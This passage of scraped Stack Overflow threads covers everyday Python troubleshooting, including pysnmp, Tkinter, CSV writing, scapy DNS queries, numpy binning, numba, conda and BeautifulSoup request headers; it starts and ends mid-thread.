button3 = ttk.Button(root, text="Run", state='disabled', command=modify_word_doc)
button3.pack()

root.mainloop()
|
pysnmp error on specific query
Question: I have been trying to implement code that loads my device MIBs and walks through all the OIDs. In this one case, when I try to load the OID for snmp 1.3.6.1.2.1.11, smi throws an exception when trying to load a specific OID. The previous OID works successfully: '.1.3.6.1.2.1.11.29.0', but this one generates the error message: '.1.3.6.1.2.1.11.30.0'
The exception is:
> File "/opt/anaconda/lib/python2.7/site-packages/pysnmp/smi/rfc1902.py", line 859, in resolveWithMib
> raise SmiError('MIB object %r having type %r failed to cast value %r: %s' % (self.__args[0].prettyPrint(), self.__args[0].getMibNode().getSyntax().__class__.__name__, self.__args[1], sys.exc_info()[1]))
> SmiError: MIB object 'SNMPv2-MIB::snmpEnableAuthenTraps.0' having type 'Integer32' failed to cast value Integer32(808466736): ConstraintsIntersection(ConstraintsIntersection(ConstraintsIntersection(), ValueRangeConstraint(-2147483648, 2147483647)), SingleValueConstraint(1, 2)) failed at: "SingleValueConstraint(1, 2) failed at: "808466736"" at Integer32
Here is sample code that demonstrates the error. You will need to modify DEVICE_IP. It assumes that you are running SNMP v1 against community 'public'. It is running pysnmp version 4.3.2.
from pysnmp.entity.rfc3413.oneliner import cmdgen
from pysnmp.smi.rfc1902 import ObjectIdentity

DEVICE_IP = 'localhost'

def get_oid(oid):
    """
    Requires a valid oid as input and retrieves the given OID
    """
    snmp_target = (DEVICE_IP, 161)
    cmdGen = cmdgen.CommandGenerator()
    result = None
    errorIndication, errorStatus, errorIndex, varBindTable = cmdGen.nextCmd(
        cmdgen.CommunityData('public', mpModel=0),
        cmdgen.UdpTransportTarget(snmp_target),
        ObjectIdentity(oid, last=True),
        lexicographicMode=False
    )
    if errorIndication:
        print(errorIndication)
    else:
        for varBindTableRow in varBindTable:
            for name, val in varBindTableRow:
                try:
                    result = str(val)
                except:
                    raise
    return result

# Does not Throw Error
print get_oid('.1.3.6.1.2.1.11.29.0')
# Throws Error
print get_oid('.1.3.6.1.2.1.11.30.0')
Answer: Your SNMP agent responded with _1.3.6.1.2.1.11.30.0=808466736_ while OID
1.3.6.1.2.1.11.30.0 identifies MIB object _snmpEnableAuthenTraps_ of type
INTEGER with only two values permitted: 1 and 2.
Here is formal definition from SNMPv2-MIB:
snmpEnableAuthenTraps OBJECT-TYPE
    SYNTAX  INTEGER { enabled(1), disabled(2) }
    ...
So this time pysnmp seems to do the right thing - it shields you from the
value that makes no sense. Root cause of this problem is the SNMP agent that
sends malformed values for MIB objects.
|
Python 2.7 on OS X: TypeError: 'frozenset' object is not callable on each command
Question: I get this error on every command with Python:
➜ /tmp sudo easy_install pip
Traceback (most recent call last):
  File "/usr/bin/easy_install-2.7", line 11, in <module>
    load_entry_point('setuptools==1.1.6', 'console_scripts', 'easy_install')()
  File "/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/pkg_resources.py", line 357, in load_entry_point
    return get_distribution(dist).load_entry_point(group, name)
  File "/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/pkg_resources.py", line 2394, in load_entry_point
    return ep.load()
  File "/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/pkg_resources.py", line 2108, in load
    entry = __import__(self.module_name, globals(),globals(), ['__name__'])
  File "/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/setuptools/__init__.py", line 11, in <module>
    from setuptools.extension import Extension
  File "/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/setuptools/extension.py", line 5, in <module>
    from setuptools.dist import _get_unpatched
  File "/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/setuptools/dist.py", line 15, in <module>
    from setuptools.compat import numeric_types, basestring
  File "/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/setuptools/compat.py", line 17, in <module>
    import httplib
  File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/httplib.py", line 80, in <module>
    import mimetools
  File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/mimetools.py", line 6, in <module>
    import tempfile
  File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/tempfile.py", line 35, in <module>
    from random import Random as _Random
  File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/random.py", line 49, in <module>
    import hashlib as _hashlib
  File "build/bdist.macosx-10.11-intel/egg/hashlib.py", line 115, in <module>
    """
TypeError: 'frozenset' object is not callable
What can I do with this?
Answer: Removing this package helped me:
sudo rm -rf /Library/Python/2.7/site-packages/hashlib-20081119-py2.7-macosx-10.11-intel.egg
|
remove extra newline when writing to a file
Question: This little script writes keywords to a file, but adds an extra newline between each keyword. How do I make it stop? I.e. instead of

Apple

Banana

Crayon

I want

Apple
Banana
Crayon

I tried Googling "listwrite" but it didn't help. I am sure this is a very simple thing but I can't figure it out.
#!/usr/local/bin/python
###################################################
# nerv3.py
# Goal: Named entity recognition script to pull names/places from text
#       called as python nerv3.py text_path_or_file
#
# Inputs:
#   path - text file or directory containing text files
#   output - output file name
#   uuid
# Outputs:
#   Output file written
#   People, Places, Others files
#
###################################################
# gonna need to install AlchemyAPI
import AlchemyAPI
import argparse
import xml.etree.ElementTree as ET
import collections
import codecs
import os
#from IPython import embed

#=================================================
def listwrite(output_file, thelist):
    for item in thelist:
        item.encode('utf-8')
        output_file.write("%s\n\n" % item)

#=================================================
def main():
    tmpdir = "/tmp/pagekicker"

    #personal api key saved as api_key.txt
    parser = argparse.ArgumentParser()
    parser.add_argument('path', help="target file or directory for NER")
    parser.add_argument('output', help="target file for output")
    parser.add_argument('uuid', help="uuid")
    args = parser.parse_args()
    in_file = args.path
    out_file = args.output
    uuid = args.uuid
    folder = os.path.join(tmpdir, uuid)
    print folder
    cwd = os.getcwd()
    apikey_location = os.path.join(cwd, "api_key.txt")

    with open(in_file) as f:
        text = f.read()

    alchemyObj = AlchemyAPI.AlchemyAPI()
    alchemyObj.loadAPIKey(apikey_location)
    result = alchemyObj.TextGetRankedNamedEntities(text)
    root = ET.fromstring(result)

    place_list = ['City', 'Continent', 'Country', 'Facility', 'GeographicFeature',
                  'Region', 'StateOrCounty']
    People = {}
    Places = {}
    Other = {}

    for entity in root.getiterator('entity'):
        if entity[0].text == 'Person':
            People[entity[3].text] = [entity[1].text, entity[2].text]
        elif entity[0].text in place_list:
            Places[entity[3].text] = [entity[1].text, entity[2].text]
        else:
            Other[entity[3].text] = [entity[1].text, entity[2].text]

    #print lists ordered by relevance
    Places_s = sorted(Places, key=Places.get, reverse=True)
    People_s = sorted(People, key=People.get, reverse=True)
    Other_s = sorted(Other, key=Other.get, reverse=True)

    # here is where things seem to go awry
    with codecs.open(out_file, mode='w', encoding='utf-8') as o:
        listwrite(o, People_s)
        listwrite(o, Places_s)
        listwrite(o, Other_s)

    out_file = os.path.join(folder, 'People')
    with codecs.open(out_file, mode='w', encoding='utf-8') as o:
        listwrite(o, People_s)

    out_file = os.path.join(folder, 'Places')
    with codecs.open(out_file, mode='w', encoding='utf-8') as o:
        listwrite(o, Places_s)

    out_file = os.path.join(folder, 'Other')
    with codecs.open(out_file, mode='w', encoding='utf-8') as o:
        listwrite(o, Other_s)

#=================================================
if __name__ == '__main__':
    main()
Answer:
def listwrite(output_file,thelist):
    for item in thelist:
        item.encode('utf-8')
        output_file.write("%s\n\n" % item)
In the code, listwrite is defined as a function. For every `item` in
`thelist`, it writes the `item`, followed by two newline characters. To remove
the extra line, simply remove one of the `\n`s.
def listwrite(output_file,thelist):
    for item in thelist:
        item.encode('utf-8')
        output_file.write("%s\n" % item)
|
Python: subprocess call doesn't recognize * wildcard character?
Question: I want to remove all the *.ts files in a directory. `os.remove` didn't work.
And this doesn't expand `*`
>>> args = ['rm', '*.ts']
>>> p = subprocess.call(args)
rm: *.ts No such file or directory
Answer: The `rm` program takes a list of filenames, but `*.ts` isn't a list of
filenames, it's a pattern for matching filenames. You have to name the actual
files for `rm`. When you use a shell, the shell (but not `rm`!) will expand
patterns like `*.ts` for you. In Python, you have to explicitly ask for it.
import glob
import subprocess
subprocess.check_call(['rm', '--'] + glob.glob('*.ts'))
# ^^^^ this makes things much safer, by the way
Of course, why bother with `subprocess`?
import glob
import os
for path in glob.glob('*.ts'):
    os.remove(path)
|
converting char to list in R
Question: I wrote a python script that reads mails' content and appends it to a list, and I am calling this python script from R. The problem is that R treats the list as one element instead of two.
Here is my python script:
import sys
import string
import glob

def parseOutText(f):
    f.seek(0)
    all_text = f.read()
    ### split off metadata
    content = all_text.split("Bcc:")
    return content

def main():
    path = "D:/Hadoop/practice/machine_learning/mails/*.txt"
    files = glob.glob(path)
    file_list = []
    for each_file in files:
        ff = open(each_file, "r")
        text = parseOutText(ff)
        #text = sys.stdout.write(ff.read())
        file_list.append(text)
        ff.close()
    print(file_list)
    print(len(file_list))

And the output for this is:
> [['From: xxx@xxx.com\nTo: xyz@xxx.com\nSubject: Hi\nCc: abc@xxx.com\nMime-
> Version: 1.0\nContent-Transfer-Encoding: 7bit\n', '
> test@xxx.com\n\nHi,\n\nYour problem is resolved. \n\nPlease reply to this
> email and let us know if it is not working.\n\nThank you \nCCD.'], ['From:
> abc@xxx.com\nTo: test2@xxx.com\nSubject: Hi\nCc: xyz@xxx.com\nMime-Version:
> 1.0\nContent-Transfer-Encoding: 7bit\n', ' test@xxx.com\n\nHi,\n\nThis will
> not work out unless and until you work harder.\n\nThank you \nCCD.']] 2
R code:
#setting the working directory to the mails folder
setwd("D:/Hadoop/practice/machine_learning/mails")
command = "python"
output = as.list(system2(command, args = "D:/Hadoop/practice/machine_learning/mails/testR.py", stdout = TRUE))
print(output)
print(length(output))
print(str(output))
str(command)
R output:
> [[1]] [1] "[['From: xxx@xxx.com\nTo: xyz@xxx.com\nSubject: Hi\nCc:
> abc@xxx.com\nMime-Version: 1.0\nContent-Transfer-Encoding: 7bit\n', '
> test@xxx.com\n\nHi,\n\nYour problem is resolved. \n\nPlease reply to this
> email and let us know if it is not working.\n\nThank you \nCCD.'], ['From:
> abc@xxx.com\nTo: test2@xxx.com\nSubject: Hi\nCc: xyz@xxx.com\nMime-Version:
> 1.0\nContent-Transfer-Encoding: 7bit\n', ' test@xxx.com\n\nHi,\n\nThis will
> not work out unless and until you work harder.\n\nThank you \nCCD.']]"
>
> print(length(output)) [1] 1
How can I get two mails as two elements in the same list?
mails:
From: xxx@xxx.com
To: xyz@xxx.com
Subject: Hi
Cc: abc@xxx.com
Mime-Version: 1.0
Content-Transfer-Encoding: 7bit
Bcc: test@xxx.com
Hi,
Your problem is resolved.
Please reply to this email and let us know if it is not working.
Thank you
CCD.
2nd mail:
From: abc@xxx.com
To: test2@xxx.com
Subject: Hi
Cc: xyz@xxx.com
Mime-Version: 1.0
Content-Transfer-Encoding: 7bit
Bcc: test@xxx.com
Hi,
This will not work out unless and until you work harder.
Thank you
CCD.
Answer:
l = as.list(cbind(text1, text2))
Gives me the following output:
[[1]]
[1] " From: xxx@xxx.com\nTo: xyz@xxx.com\nSubject: Hi\nCc: abc@xxx.com\nMime-Version: 1.0\nContent-Transfer-Encoding: 7bit\nBcc: test@xxx.com\n\nHi,\n\nYour problem is resolved. \n\nPlease reply to this email and let us know if it is not working.\n\nThank you \nCCD."
[[2]]
[1] "From: abc@xxx.com\nTo: test2@xxx.com\nSubject: Hi\nCc: xyz@xxx.com\nMime-Version: 1.0\nContent-Transfer-Encoding: 7bit\nBcc: test@xxx.com\n\nHi,\n\nThis will not work out unless and until you work harder.\n\nThank you \nCCD."
|
docker container not able to write on host machine
Question: If I run the following code, I can convert the csv file into a format that I
require.
import csv
import json

csvfile = open('/tmp/head.csv', 'r')
jsonfile = open('/tmp/file.json', 'w')
fieldnames = ("user","messageid","destination","col1", "col2", "code1","code2", "mydate", "status")
reader = csv.DictReader(csvfile, fieldnames)
for row in reader:
    jsonfile.write(json.dumps(row))
When I run the code at command prompt, it works.
python covert.py
But if I create a docker container, ubuntu refuses to write to the disk.
alias python34='docker run -i -v "$(pwd)":/tmp/ --rm shantanuo/pyrun:3.4 python "$@"'
python34 /tmp/convert.py
I got a segmentation fault error. I tried disabling the ubuntu firewall using
sudo ufw disable
I tried removing AppArmor, but I am still not able to write to the /tmp/ folder of the host machine through the python container. This is a ubuntu-specific issue: I am able to use the same alias on an Amazon Linux ec2 instance.
Answer: This was because the container (pyrun) that I was using was not optimized to
handle large files. When I used the default python image, it worked.
docker run -it --rm -v "$PWD":/usr/src/myapp -w /usr/src/myapp python:3 python convert.py
|
Python - dig ANY equivalent with scapy module
Question: I want to use the python module scapy to perform an equivalent command of
dig ANY google.com @8.8.4.4 +notcp
I've made a simple example code:
from scapy.all import *
a = sr(IP(dst="8.8.4.4")/UDP(sport=RandShort(),dport=53)/DNS(qd=DNSQR(qname="google.com",qtype="ALL",qclass="IN")))
print str(a[0])
It sends and receives a packet, but when I sniffed the packet the response said `Server failure`.
[Wireshark Screenshot - scapy](http://i.stack.imgur.com/Ug2Al.png)
[Wireshark Screenshot - dig](http://i.stack.imgur.com/bt1sw.png)
Sniffing the `dig` command itself looks nearly the same, but it gets a correct response and also does not send an additional `ICMP - Destination unreachable` packet; this only comes up when sending with scapy. If you need more information, feel free to ask. Maybe someone can help me with this.
**EDIT:**
Maybe the `ICMP - Destination unreachable` packet was sent because `8.8.4.4` tries to send the response to my `sport`, which is closed? But why would `dig` work then?!
Answer: Got the Python code working with scapy..
srp(Ether()/IP(src="192.168.1.101",dst="8.8.8.8")/UDP(sport=RandShort(),dport=53)/DNS(rd=1,qd=DNSQR(qname="google.com",qtype="ALL",qclass="IN"),ar=DNSRROPT(rclass=3000)),timeout=1,verbose=0)
In Wireshark we can see now a correct response: [Wireshark
Screenshot](http://i.stack.imgur.com/UKtIq.png)
But I'm still getting the `ICMP - Destination unreachable` packet, and I don't know why.
|
Write dictionary to csv with one line per value
Question: I am quite new to Python so please excuse me if this is a really basic
question. I have a Python dictionary such as this one:
`foo = {'bar1':['a','b','c'], 'bar2':['d','e']}`
I would like to write it to a csv file, with one line per **value** and the
key as first element of each row. The output would be (whatever the quotation
marks):
bar1,'a'
bar1,'b'
bar1,'c'
bar2,'d'
bar2,'e'
I have tried this, [as suggested here](http://stackoverflow.com/questions/8685809/python-writing-a-dictionary-to-a-csv-file-with-one-line-for-every-key-value):
import csv

with open('blah.csv', 'wb') as csv_file:
    writer = csv.writer(csv_file)
    for key, value in foo.items():
        writer.writerow([key, value])
but this gives the following output, with one line per **key** :
bar1,"['a', 'b', 'c']"
bar2,"['d', 'e']"
Thanks for your help!
Answer: This is because `[key, value]` contains multiple "values" within `value`. Try iterating over them like this:

for key, values in foo.items():
    for value in values:
        writer.writerow([key, value])
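With the example `foo`, this writes the rows below (the order of the keys may vary, since dicts are unordered here):

bar1,a
bar1,b
bar1,c
bar2,d
bar2,e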
|
python edge detector - mask the area were it's completly black
Question: I have used the canny edge detector on an image. It detected some areas in the image and displays nothing for the other areas. Now I want to mask the areas of the original image that were completely black. How can I do it? I am using python and skimage or opencv (it doesn't matter which one).
from skimage.feature import canny
from skimage.morphology import closing
import skimage.io
import numpy as np
import os
import matplotlib.pyplot as plt
import cv2
img = skimage.io.imread("test.jpg",as_grey=True)
fig, ax = plt.subplots(1, 1, figsize=(20,20))
ax.imshow(img,'gray')
ax.set_axis_off()
plt.show()
edges = canny(img)
close = closing(edges)
fig, ax = plt.subplots(1, 1, figsize=(20,20))
ax.imshow(close,'gray')
ax.set_axis_off()
plt.show()
[![Original
Image](http://i.stack.imgur.com/osYuB.jpg)](http://i.stack.imgur.com/osYuB.jpg)
[![After canny and
closing](http://i.stack.imgur.com/hbkMt.png)](http://i.stack.imgur.com/hbkMt.png)
Now what I want is for the white part (in the second image) to be the only part displayed in the original image (masking).
Answer: You can simply apply a binary mask on a RGB image using:
close_BGR = cv2.cvtColor(close, cv2.COLOR_GRAY2BGR)
# Assuming that the img is of RGB format
masked_image = cv2.min(close_BGR, img)
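An equivalent sketch using plain numpy boolean indexing on the grayscale image, assuming `close` is a boolean mask with the same shape as `img`:

masked = img.copy()
masked[~close] = 0  # zero out everything outside the mask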
|
Cant access instance variable from another class
Question: I have checked many questions answered here, but I can't access an instance variable from another class (I have tried [this](http://stackoverflow.com/questions/19993795/how-would-i-access-variables-from-one-class-to-another) as an example):
#in file: view.py
class treeview():
    def __init__(self):
        ....(no mention of row_num)

    def viewer(self, booklist, act=-1):
        row_num = len(treeview().full_list)
        print(row_num) # prints the correct value, which is > 0
        return row_num

#in main file
class Window(Gtk.ApplicationWindow):
    def __init__(self, application, giofile=None):
        self.TreeView = view.treeview()

    def extract_data_from_cr(self, select_button):
        print(self.TreeView.row_num)
Gives error:
AttributeError: 'treeview' object has no attribute 'row_num'
If I try to add `row_num` inside treeview() as:
class treeview():
    def __init__(self):
        self.row_num = 0

    def viewer(self, booklist, act=-1):
        self.row_num = len(treeview().full_list)
        print(self.row_num)
        # return row_num
then `print(self.TreeView.row_num)` in `main` always yields `0`. I can't find what's going wrong here. Kindly help.
**After Mitch's comment**, if I define row_num without calling treeview() again, as:

class treeview():
    def __init__(self):
        self.row_num = 0

    def viewer(self, booklist, act=-1):
        self.row_num = len(self.bookstore)
        print(type(self.bookstore)) # <class 'gi.overrides.Gtk.ListStore'>
        print(self.row_num) # 5 (expected for a particular case)

then, when calling `extract_data_from_cr`, I am expecting this number:

def extract_data_from_cr(self, select_button):
    print(self.TreeView.row_num) # is giving 0
**A MCVE**
$ cat mcve.py

class classA():
    def __init__(self):
        self.row_num = 0
        print("HiA")

    def define(self):
        la = ["A", "B", "C"]
        self.row_num = len(la)
        print(self.row_num) #prints 3 when get called from mcve2
        return(self.row_num)

classA().define()

and

$ cat mcve2.py

#!/usr/bin/python
import mcve

class classB():
    def get_val(self):
        self.MCVE = mcve.classA()
        print("Hi2")
        print(self.MCVE.row_num) #prints 0

classB().get_val()
Result:
python3 mcve2.py
HiA
3
HiA
Hi2
0
I know that if I call `classA().define()` explicitly from `classB.get_val()`, I will get the desired value. But I am looking to transfer the value it already got (`Result: line 2`).
Answer: _Working from your edited MCVE:_
When you set `self.MCVE = classA()` in the `get_val` method, you are setting
`MCVE` to be a _new instance_ of `classA`. Hence, any modifications to the
`row_num` attribute of some other instance of `classA` are irrelevant.
e.g. `classA().define()` is modifying the `row_num` attribute for an entirely
different class instance. Its `row_num` is an instance variable which is only
defined for _that particular instance_.
Should you want the `row_num` attribute to persist across all `classA`
instances, you would want to set it as a class variable, like so (bit of a
nonsensical example though).
class classA():
    row_num = 0

    def __init__(self):
        print("HiA")

    def define(self):
        la = ["A", "B", "C"]
        classA.row_num = len(la)
        print(classA.row_num) #prints 3 when get called from mcve2
        return classA.row_num

classA().define()

class classB():
    def get_val(self):
        self.MCVE = classA()
        print("Hi2")
        print(self.MCVE.row_num) #prints 0

classB().get_val()
**Outputs** :
HiA
3
HiA
Hi2
3
You otherwise may be looking to use a `property`, which could be set in the
`__init__` of the class.
|
Installing a package in Conda environment, but only works in Python not iPython?
Question: I am using an Ubuntu docker image. I've installed Anaconda on it with no issues. I'm now trying to install tensorflow, using the directions on the tensorflow website:
conda create --name tensorflow python=3.5
source activate tensorflow
<tensorflow> conda install -c conda-forge tensorflow
It installs with no errors. However, when I import it in `IPython`, it tells me there is no module `tensorflow`. But if I import it in `Python`, it works fine. What's going on and how do I fix it?
Answer: You have to install IPython in the conda environment
source activate tensorflow
conda install ipython
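The cause: before IPython is installed into the environment, the `ipython` command on your PATH is the base Anaconda one, whose `sys.path` does not include the environment's site-packages, while `python` resolves to the environment's own interpreter. A quick way to verify (paths are illustrative):

source activate tensorflow
which ipython   # should now point inside the env, e.g. .../envs/tensorflow/bin/ipython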
|
Python: How to detect a particular number inside a long serial number
Question: I have been working on this project, a small Python and Tkinter project, as I'm a beginner, and I would have finished it already if it weren't for a little issue I detected after doing a few tests. The program should say whether a serial number entered in an input is a "devil number" or not, depending on whether the number has "666" in it. In the positive case, there should be a "666" in it, away from other 6s, meaning there shouldn't be something like "6666". If "666" is repeated several times inside the serial number (without the groups being stuck together, as in "666666") it can be considered a devil number too. The issue I have is that numbers that contain only one "666" and at the same time end with it are not considered devil numbers, while they should be. I can't seem to solve this problem.
To realise this project, I used Python and Tkinter. The code is as follows:
"""*************************************************************************"""
""" Author: CHIHAB Version: 2.0 Email: chihab2007@gmail.com """
""" Purpose: Practice Level: Beginner 2016/2017 """
"""*************************************************************************"""
############################ I M P O R T S#####################################
from tkinter import*
from types import *
############################ T K I N T E R ####################################
main = Tk()
e = Entry(main, bg="darkblue", fg="white")
e.pack(fill=X)
l = Label(main, bg="blue", fg="yellow")
l.pack(fill=X)
############################ F U N C T I O N S ################################
def devil(x): #TEST ENTERED VALUE FOR DEVIL NUMBER
    c = 0
    i = 0
    l = list(x)
    while i < len(l):               # This block of code means that as long as the index i
        if l[i] == "6":             # is below the length of the list to which we have
            c = c+1                 # converted the entry, the program is allowed to keep
            print("this is c :", c) # reading through the list's characters.
        else:
            c = 0
        if i <= (len(l)-2) and c == 3 and l[i+1] != "6":
            return True
        i = i+1
    return False
def printo():  # GET VALUE FROM ENTRY AND SHOW IT IN LABEL
    x = e.get()
    if x != "":
        if x.isnumeric() == True:  # SHOW ENTERED VALUE IF INTEGER
            y = devil(x)
            if y == True:
                print("The number you entered is a devil number.")
                l.config(text="The number you entered is a devil number.", bg="blue")
            else:
                print("The number you entered is NOT a devil number.")
                l.config(text="The number you entered is NOT a devil number.", bg="blue")
            #print(x)
            e.delete(0, END)
        else:  # SHOW ERROR IF NOT INTEGER
            l.config(text="please enter an integer in the entry.", bg="red")
            print("please enter an integer in the entry.")
            e.delete(0, END)
    else:  # SHOW ERROR IF EMPTY
        l.config(text="please enter something in the entry.", bg="red")
        print("please enter something in the entry.")
############################ T K I N T E R ####################################
b = Button(main, text="Go", bg="lightblue", command=printo)
b.pack(fill=X)
main.mainloop()
Here you go, guyz. I hope my code is neat enough and that you would be able to
help me which I have no doubt about. Thank you.
Answer: If you mean that `666`, found anywhere in the number should be a match, then
it's very simple:
if '666' in '1234666321':
    print("It's a devil's number")
However, you say that `666` must be a "lone" `666`, i.e. exactly three `6`
side by side, no more, no less. Neither two, nor four. Five `6`'s are right
out. In that case, I would use [tobias_k's
regex](http://stackoverflow.com/a/38769806/344286).
Though, if you had a passionate hatred for regex, you _could_ do it using
`string.partition`:
def has_devils_number(num):
    start, mid, end = num.partition('666')
    if not mid:
        return False
    else:
        if end == '666':
            return False
        elif start.endswith('6') or end.startswith('6'):
            return has_devils_number(start) or has_devils_number(end)
        return True
Here's what the performance looks like:
>>> x = '''
... import re
... numbas = ['666', '6', '123666', '12366', '66123', '666123', '666666', '6666', '6'*9, '66661236666']
...
... def devil(x):
...     return re.search(r"(?:^|[^6])(666)(?:[^6]|$)", x) is not None
... '''
>>> import timeit
>>> timeit.timeit('[devil(num) for num in numbas]', setup=x)
13.822128501953557
>>> x = '''
... numbas = ['666', '6', '123666', '12366', '66123', '666123', '666666', '6666', '6'*9, '66661236666']
... def has_devils_number(num):
...     start, mid, end = num.partition('666')
...     if not mid:
...         return False
...     else:
...         if end == '666':
...             return False
...         elif start.endswith('6') or end.startswith('6'):
...             return has_devils_number(start) or has_devils_number(end)
...         return True
... '''
>>> timeit.timeit('[has_devils_number(num) for num in numbas]', setup=x)
9.843224229989573
I'm as surprised as you are.
|
Trying to read numbers from a file, subtract them and put the result into another file
Question:
file = open("byteS-F_FS_U.toff","r")
f = file.readline()
s = file.readline()
file.close()
f = int(f)
s = int(s)
u = s - f
file = open("bytesS-F_FS_U","w")
file.write(float(u) + '\n')
file.close()
This is what it says when I run the code:
file.write(float(u) + '\n')
TypeError: unsupported operand type(s) for +: 'float' and 'str'
I am trying to load numbers from a file that gets new numbers every few
seconds. When they're loaded they're subtracted and put into another file. I
am a new Python programmer.
Answer: First, you need to put the full path of the file you're trying to open!
With that first thing fixed, I created a loop program which opens the file
every 10 seconds and writes the result to the other file. Exceptions are
handled so that if another process is writing to the file while it is being
opened/read, it does not crash. Python 3 syntax.
import time

while True:
    try:
        file = open(r"fullpath_to_your_file\byteS-F_FS_U.toff", "r")
        f = int(file.readline())
        s = int(file.readline())
        file.close()
    except Exception as e:
        # file is being written to, not enough data, whatever: ignore (but print a message)
        print("read issue " + str(e))
    else:
        u = s - f
        file = open(r"fullpath_to_your_file\bytesS-F_FS_U", "w")  # update the file with the new result
        file.write(str(u) + '\n')
        file.close()
    time.sleep(10)  # wait 10 seconds
|
rebinning a list of numbers in python
Question: I've a question about rebinning a list of numbers, with a desired bin-width.
It's basically what a frequency histogram does, but I don't want the plot,
just the bin number and the number of occurrences for each bin.
So far I've already written some code that does what I want, but it's not very
efficient. Given a list `a`, in order to rebin it with a bin-width equal to 3,
I've written the following:
import os, sys, math
import numpy as np

# list of numbers
a = list(range(3000))
# number of entries
L = int(len(a))
# desired bin width
W = 3
# number of bins with width W
N = int(L/W)
# definition of new empty array
a_rebin = np.zeros((N, 2))
# cycles to populate the new rebinned array
for n in range(0, N):
    k = 0
    for i in range(0, L):
        if a[i] >= (W*n) and a[i] < (W+W*n):
            k = k+1
    a_rebin[n] = [W*n, k]
# print
print a_rebin
Now, this does exactly what I want, but I think it's not so smart, as it reads
the whole list `N` times, with `N` number of bins. It's fine for small lists.
But, as I have to deal with very large lists and rather small bin-widths, this
translates into huge values of `N` and the whole process takes a very long
time (hours...). Do you have any ideas to improve this code? Thank you in
advance!
Answer: If you use `a = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]`, your solution is:
> [[ 0. 3.]
> [ 3. 3.]
> [ 6. 3.]]
How do you interpret this? The intervals are 0..2, 3..5, 6..8? I think you are
missing something.
Using
[numpy.histogram()](http://docs.scipy.org/doc/numpy/reference/generated/numpy.histogram.html)
hist, bin_edges = numpy.histogram(a, bins=int(len(a)/W))
print(hist)
print(bin_edges)
**Output:**
> [3 3 4]
> [ 0. 3. 6. 9.]
We have 4 values in bin_edges: 0, 3, 6 and 9. All but the last (rightmost)
bin is half-open. It means we have 3 intervals [0,3), [3,6) and [6,9],
and we have 3, 3 and 4 elements in each bin.
You can define your own bins.
import numpy
a = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
bins=[0,1,2]
hist, bin_edges = numpy.histogram(a, bins=bins)
print(hist)
print(bin_edges)
**Output:**
> [1 2]
> [0 1 2]
Now you have 1 element in [0,1) and 2 elements in [1,2].
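If you want the same `[bin_start, count]` layout as your original `a_rebin`
array, the two outputs can be combined; a sketch reusing the question's names:
import numpy as np

a = list(range(3000))
W = 3
hist, bin_edges = np.histogram(a, bins=int(len(a)/W))
a_rebin = np.column_stack((bin_edges[:-1], hist))  # [bin start, count] per bin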
|
NumPy/Pandas: convert array of "steps" into bool mask
Question: I have an array like this:
arr = np.array([4, 6, 3, 9, 2, 100, 3, 1, 1, 1, 1])
I want to convert it to a bool array like this:
[ T, F, F, F, T, F, T, F, F, T, T]
# 4, 6, 3, 9, 2, 100, 3, 1, 1, 1, 1
I can do it with a loop like this:
mask = np.zeros(len(arr), dtype=bool)
ii = 0
while ii < len(arr):
    mask[ii] = True
    ii += arr[ii]
It's sort of an indirect indexing scheme, where each element in the input
tells us how many subsequent elements are invalid.
How can I do it without using a Python loop, so that it will be fast if the
input array is large? I'm happy to use Pandas too.
Answer: There may be some vectorization trick I'm not thinking of, but if you can use
`numba`, it's well suited for problems like this - this loop should now be
very fast.
import numba
import numpy as np

@numba.jit(nopython=True)
def jump_mask(arr):
    mask = np.zeros(len(arr), dtype=np.bool_)
    ii = 0
    while ii < len(arr):
        mask[ii] = True
        ii += arr[ii]
    return mask
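Example usage with the array from the question (the first call pays the
one-time JIT compilation cost; later calls are fast):
arr = np.array([4, 6, 3, 9, 2, 100, 3, 1, 1, 1, 1])
print(jump_mask(arr))
# [ True False False False  True False  True False False  True  True]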
|
Undefined index: HTTP_ACCEPT_LANGUAGE using BeautifulSoup/Python
Question: I'm learning Python and I'm trying to parse a webpage made with PHP using
BeautifulSoup. My problem is that my script shows this error:
<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">
<h4>A PHP Error was encountered</h4>
<p>Severity: Notice</p>
<p>Message: Undefined index: HTTP_ACCEPT_LANGUAGE</p>
<p>Filename: hooks/detecta_idioma.php</p>
<p>Line Number: 110</p>
</div>
when I try to do this
html = urllib.urlopen(url).read()
web = BeautifulSoup(html,'html.parser')
print web
etiquetas = web('a')
I thought this error was due to executing my script from the command line
instead of a web browser but, executing this script from Apache, I get the
same error.
Does anyone know how I can set that header so I can parse the URL?
Answer: Looks like the page requires you to have the `Accept-Language` header passed
along with your request. Here is an example how to do that with
[`requests`](http://docs.python-requests.org/en/master/):
import requests
from bs4 import BeautifulSoup

url = "my url"
response = requests.get(url, headers={"Accept-Language": "en-US,en"})
html = response.content
web = BeautifulSoup(html, 'html.parser')
|
Getting TypeError with speech_recognition module in Python
Question: I want to convert speech to text in real time using the module
`SpeechRecognition 3.4.6`. I've installed everything and now I am trying a
simple example; here's the code:
import speech_recognition as sr
# obtain audio from the microphone
r = sr.Recognizer()
with sr.Microphone() as source:
print("Say something!")
audio = r.listen(source)
# recognize speech using Sphinx
try:
print("Sphinx thinks you said " + r.recognize_sphinx(audio))
except sr.UnknownValueError:
print("Sphinx could not understand audio")
except sr.RequestError as e:
print("Sphinx error; {0}".format(e))
I am getting error at line `audio = r.listen(source)`, the error traceback is:
Traceback (most recent call last):
File "sr.py", line 4, in <module>
audio = r.listen(source) # listen for the first phrase and extract it into audio data
File "/usr/local/lib/python2.7/dist- packages/speech_recognition/__init__.py", line 493, in listen
buffer = source.stream.read(source.CHUNK)
File "/usr/local/lib/python2.7/dist-packages/speech_recognition/__init__.py", line 139, in read
